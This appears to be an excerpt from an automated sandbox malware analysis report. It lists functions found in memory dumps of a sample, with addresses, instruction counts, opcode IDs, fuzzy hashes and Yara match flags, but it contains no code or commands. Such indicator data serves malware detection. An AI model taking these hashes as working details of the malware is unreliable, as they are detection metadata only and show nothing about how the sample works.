                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7609df40421f803ba74e4e5a7f61a16ac610af0e456a686df4bc1424b9eb9416
                                                                                                                                                                                                                                                          • Instruction ID: 894013b4cddf8280fe9985f448069e1978e98a105e8524c3297e15ac4f8d6e0b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7609df40421f803ba74e4e5a7f61a16ac610af0e456a686df4bc1424b9eb9416
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFB14772A143106BDB24DF24CC52A7BB7E5EF81314F09892EEC8697390E774E905C796
                                                                                                                                                                                                                                                          Function 02475BB7 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1ef1897c54fa2071ecb99d8e80b6651a11f677e69ba45229124588226b3d5fa7
                                                                                                                                                                                                                                                          • Instruction ID: fd0ad14f469fd7f8be4ec2729ff1ee3d9cd27f1a0c200aa357c7ec80b511e9d1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ef1897c54fa2071ecb99d8e80b6651a11f677e69ba45229124588226b3d5fa7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F1BE356087418FC724CF29C8806ABFBE6EFD9304F48982EE4E587751E675D849CB52
                                                                                                                                                                                                                                                          Function 00405950 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d3ea000337597ed49648caa6c3f898df650eaa935422a56c09eec78adaff2b55
                                                                                                                                                                                                                                                          • Instruction ID: af7042075d954c2f255990e0047815087897ea865b94a08f0ee2ad65f5f0e8bc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3ea000337597ed49648caa6c3f898df650eaa935422a56c09eec78adaff2b55
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05F1E3356087418FD724CF29C88162BFBE6EFD9304F08882EE4D587791E679E904CB96
                                                                                                                                                                                                                                                          Function 02492607 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 28b04a55b0afd722243c8f4111b4868ccd864ddd78f9a9094ddf5f314c0f2cc6
                                                                                                                                                                                                                                                          • Instruction ID: 6f7f31ad8a6b10912bb0baa835875978572c61c087cf2b26e32738d5cd4898f8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28b04a55b0afd722243c8f4111b4868ccd864ddd78f9a9094ddf5f314c0f2cc6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DB107B2A04311ABDB24DF24C891B67B7A1FF84318F04856DED899B380E7B5D945CB92
                                                                                                                                                                                                                                                          Function 004223A0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9964d39c61cd3b2794fe14b554bc3cd6bb6de5af44e00a735a8d134af0461122
                                                                                                                                                                                                                                                          • Instruction ID: b5892ab382dddcfdfd1d94d0be47f02d5ea24576abd0edcd507820bf7b56d976
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9964d39c61cd3b2794fe14b554bc3cd6bb6de5af44e00a735a8d134af0461122
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78B11A72A08321ABD714DF24D891767B3E1FFC4318F14852DE9899B381E7B8E905C79A
                                                                                                                                                                                                                                                          Function 024A7A47 Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: dd365453ab748e0273ff5c586676980c7c3044cd1325da56744782b8c68ce235
                                                                                                                                                                                                                                                          • Instruction ID: 75246f9fc7785efa00bbdf74621ec02289069e4376f976c9b418a17e482e7f7b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd365453ab748e0273ff5c586676980c7c3044cd1325da56744782b8c68ce235
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAC12A32E046508FD724CB7CC8613AEFBE25BD9224F19836ED8A6A73D1D6358941C791
                                                                                                                                                                                                                                                          Function 0248E087 Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b17a9a249dee50189471622261e6c85febc1b408976e8f514adcc3ecb881b65a
                                                                                                                                                                                                                                                          • Instruction ID: ab94a08ca612d5dfd4bd3df7c5e39867b98a80ff9f43c0af925e9de2b6a39bca
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b17a9a249dee50189471622261e6c85febc1b408976e8f514adcc3ecb881b65a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96B1EF71A15201EFD711AF24CC40B1BBBE2BFD9314F148A2EF898A76A0D772DC549B46
                                                                                                                                                                                                                                                          Function 0041DE20 Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f3adbf9656ac4d5bb57d7c42e32c36d92f3f14e42cee5d00cb49a14ab61a527a
                                                                                                                                                                                                                                                          • Instruction ID: fafd2c305fa30de8266e08fde3152fb23d27fc24ba4380c9d819510652bcf668
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3adbf9656ac4d5bb57d7c42e32c36d92f3f14e42cee5d00cb49a14ab61a527a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80B12075A04301BFD7118F24EC41B6BBBE1BFD9314F108A2EF898A32A0D7759D549B4A
                                                                                                                                                                                                                                                          Function 024764A7 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                                                                                                                                                                                          • Instruction ID: 620d8e7634948c83e41be619da85afde0703459452a904dc5d4b0bb006f825f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9C15DB29087418FC360CF68CC96BABBBE1BF85318F09492DD1D9C6342D778A155CB45
                                                                                                                                                                                                                                                          Function 00406240 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                                                                                                                                                                                          • Instruction ID: b0da67189007bcc97d6055f8bbbbefa6b2a6acbc0e85e8bb44e11b41e7f0aee1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50C15DB29087418FC360CF68DC96BABB7E1BF85318F09492DD1DAD6342D778A155CB0A
                                                                                                                                                                                                                                                          Function 024AF1C7 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0473d3d9365f4777548ed1e225e4c5d05c91736968ba59909c518f40080e9433
                                                                                                                                                                                                                                                          • Instruction ID: dd2d80b8d0343b75292a1bc903663831d237cf47dfcb5a5fb2b0b329c0d3d34d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0473d3d9365f4777548ed1e225e4c5d05c91736968ba59909c518f40080e9433
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C391F4366043018FC715DF18C8A092BB3E2FFE9754F1A846DE8858B754EB32E855CB82
                                                                                                                                                                                                                                                          Function 0043EF60 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 41c9a8aaa953f342e7df7730bcfbf320799c20867a53ea05caeaa228854ed980
                                                                                                                                                                                                                                                          • Instruction ID: df5d66982e82d9da0c83d8871eb17dc63a9cae4063427cc854b8ed9741255339
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41c9a8aaa953f342e7df7730bcfbf320799c20867a53ea05caeaa228854ed980
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B191D035A042029BD714DF18D890A2BB3E2FFD9710F1A947DE8848B365DB35EC15CB86
                                                                                                                                                                                                                                                          Function 004162F1 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: f44eee025959f928feffa431c2f4669b6dff033b596fd9a7cfdae4d61a59f324
                                                                                                                                                                                                                                                          • Instruction ID: b19f5d29e2c271d05d9b02af8e112a34cc993ab04f81e0962c2f1fd7e648b238
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f44eee025959f928feffa431c2f4669b6dff033b596fd9a7cfdae4d61a59f324
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 577126376442115BD7289B14C8D27BBB393EBC4308F2B943EC89597346C639DC42CB99
                                                                                                                                                                                                                                                          Function 024AEEE7 Relevance: .3, Instructions: 274COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ee8c2b055b9ba4267eb28ebcc8ce81a3635428a5f707dad9d4e3406103979f5d
                                                                                                                                                                                                                                                          • Instruction ID: 79560163d77da380766918a562c8aa687af793aaeca0c7483a159f08bf25c575
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee8c2b055b9ba4267eb28ebcc8ce81a3635428a5f707dad9d4e3406103979f5d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65814732A043119BC711EF18C850A6BB7A2FFE5754F0A842DE9C59B364EB31AC55CB81
                                                                                                                                                                                                                                                          Function 0043EC80 Relevance: .3, Instructions: 274COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 5a8d8db2d7b438f016d7ee66dea306c163d71c7e94052a88fde9f4b866500e20
                                                                                                                                                                                                                                                          • Instruction ID: 3592bb19b75c41b3fd134f61096da3bbee44f5b25fdbf35eb0b3c98660bcbcf4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a8d8db2d7b438f016d7ee66dea306c163d71c7e94052a88fde9f4b866500e20
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25815932A053159FC720EF19C841A6BB3A2FFD9710F1A942DE8845B3A5EB34AC51C786
                                                                                                                                                                                                                                                          Function 0248C8C8 Relevance: .3, Instructions: 269COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4a7e2e401e033a0f057dbf8ff00cebb85c56be680a596657b403d1290487c1e4
                                                                                                                                                                                                                                                          • Instruction ID: 7874df6533a9f15a108ca24133128f3e449d1f0d6459be0588a23d610936f3eb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a7e2e401e033a0f057dbf8ff00cebb85c56be680a596657b403d1290487c1e4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 736146716183518BC728DF28C8A177BB7E1EFD6314F18995EE8C69B390E3359801CBA1
                                                                                                                                                                                                                                                          Function 0041C661 Relevance: .3, Instructions: 269COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4a7e2e401e033a0f057dbf8ff00cebb85c56be680a596657b403d1290487c1e4
                                                                                                                                                                                                                                                          • Instruction ID: 837a5f8fba9af2e76d8f4c8dd82aa53554112591729eea7ba58ef9321cfe3655
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a7e2e401e033a0f057dbf8ff00cebb85c56be680a596657b403d1290487c1e4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC612775A443418BD714CF28C8D12B7B7E1EFD6314F18591DE8D69B390E3399841CB99
                                                                                                                                                                                                                                                          Function 024AABD7 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 192938dfb24e8f20dfe637f4f5dce56b929e66b281637cd9b5b5f9d33f4932f5
                                                                                                                                                                                                                                                          • Instruction ID: 9368c22740b8782dbfd6622d3eb6974eae7552b2faf0127e1d2ff90c015e37a4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 192938dfb24e8f20dfe637f4f5dce56b929e66b281637cd9b5b5f9d33f4932f5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04513A76A082308BD718DB14C860A7BF7A2EBA5714F1A846ED4C6DB351DB319C51CB86
                                                                                                                                                                                                                                                          Function 0043A970 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: dd77cab310a20848055d32eec8e39e703428ba87ede7d8102ea4086f2de4927c
                                                                                                                                                                                                                                                          • Instruction ID: 1c1b3194b7e558cfa000f4a90320cca645637f0b325fb066fb166247f68e3773
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd77cab310a20848055d32eec8e39e703428ba87ede7d8102ea4086f2de4927c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F519D36A482108FDB18DF14D850A3BF392EB89314F1AD86ED5C2E7351D6386C21CB8B
                                                                                                                                                                                                                                                          Function 024AB047 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2db7a19608500fab8a6eeb5cf2a5bcf525ef38c1fba5d3e812d6d61c9fc7f40c
                                                                                                                                                                                                                                                          • Instruction ID: 09fceac61d055e2f9f5c194e2f24a929b3c98fb2fc842d97826a18ae12c89d67
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2db7a19608500fab8a6eeb5cf2a5bcf525ef38c1fba5d3e812d6d61c9fc7f40c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA513736A143218BC7119F288894A6BF7D2FBB632CF1A496BD8D497351D3319C01CB82
                                                                                                                                                                                                                                                          Function 0043ADE0 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 139bb626af353eefa0d5b9ac084172890028062617304e8d09baf102c73951a5
                                                                                                                                                                                                                                                          • Instruction ID: b35cb8c2cf53a133ed11b1d86afdaa14cbe7a2f38a3c964bfbd89494e95443a3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 139bb626af353eefa0d5b9ac084172890028062617304e8d09baf102c73951a5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49513876A947208FC710DF28888066BF7A2EB99328F5A596ED9D4A7310D339DC11C7C7
                                                                                                                                                                                                                                                          Function 0041910E Relevance: .2, Instructions: 235COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 57cbe29f3acfbb96a0407096e691a252ccdd5f49df0adfd4ec822cf8a0979c5f
                                                                                                                                                                                                                                                          • Instruction ID: cecfcecca609f4f8aefbd91ebdf5ed5dce85e47701b726ac3bc9c92813edaa51
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57cbe29f3acfbb96a0407096e691a252ccdd5f49df0adfd4ec822cf8a0979c5f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A68118F5A083515FC718CF18C0916ABB7E2ABE5304F14892EE4DA87342D639DD8ACB56
